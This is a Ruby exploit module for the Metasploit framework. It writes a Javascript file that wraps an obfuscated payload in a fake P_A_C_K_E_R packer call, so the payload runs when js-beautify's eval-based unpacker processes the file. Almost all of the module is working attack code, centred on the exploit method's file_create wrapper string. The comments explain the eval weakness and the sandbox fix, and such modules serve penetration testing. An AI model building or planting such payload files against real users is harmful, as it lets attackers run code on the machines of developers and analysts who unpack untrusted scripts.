modules/exploits/multi/fileformat/js_unpacker_eval_injection.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
# File-format module that writes a Javascript file whose contents run as code
# when an eval-based unpacker processes it. The module description names
# js-beautify's P_A_C_K_E_R unpacker as the affected tool.
#
# The weakness being demonstrated is on the tool side: an unpacker that
# evaluates the packed expression to recover the source executes whatever that
# expression contains. Unpacking without eval, or inside an isolated sandbox,
# removes the exposure.
#
# Datastore options:
#   FILENAME  - required, name of the generated file (default 'msf.js')
#   CUSTOM_JS - optional Javascript used instead of the framework payload
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::FILEFORMAT
  include Msf::Exploit::JSObfu

  # Registers module metadata and the two datastore options.
  #
  # @param info [Hash] metadata passed in by the framework and merged with the
  #   values declared here through update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Javascript Injection for Eval-based Unpackers',
        # Same text as the original %q block, including the leading and
        # trailing newline, spelled out as adjacent literals.
        'Description' => "\n" \
          "This module generates a Javascript file that executes arbitrary code\n" \
          "when an eval-based unpacker is run on it. Works against js-beautify's\n" \
          "P_A_C_K_E_R unpacker.\n",
        'Author' => ['joev'],
        'License' => MSF_LICENSE,
        # No advisory or tracker reference is recorded for this module.
        'References' => [],
        'Platform' => 'nodejs',
        'Arch' => ARCH_NODEJS,
        'Privileged' => false,
        'Targets' => [['Automatic', {}]],
        'DisclosureDate' => '2015-02-18',
        'DefaultTarget' => 0
      )
    )

    register_options(
      [
        OptString.new('FILENAME', [true, 'The file name.', 'msf.js']),
        OptString.new('CUSTOM_JS', [false, 'Custom Javascript payload.'])
      ]
    )
  end

  # Generates the output file.
  #
  # The script body is CUSTOM_JS when that option is set, otherwise the
  # encoded framework payload; either one is passed through js_obfuscate
  # before it is embedded in the wrapper.
  def exploit
    source = datastore['CUSTOM_JS'] || payload.encoded
    script = js_obfuscate(source)

    print_status("Creating '#{datastore['FILENAME']}' file...")

    # The wrapper carries the packer prefix with an empty function body, and
    # the script sits in a self-invoking function in the first argument slot.
    # Packer output normally has a plain string literal there, so a first
    # argument that is anything else marks input a tool should not evaluate.
    # file_create is presumably supplied by the FILEFORMAT mixin and writes
    # the content to FILENAME -- confirm against the mixin.
    file_create("eval(function(p,a,c,k,e,r){}((function(){ #{script} })(),''.split('|'),0,{}))")
  end
end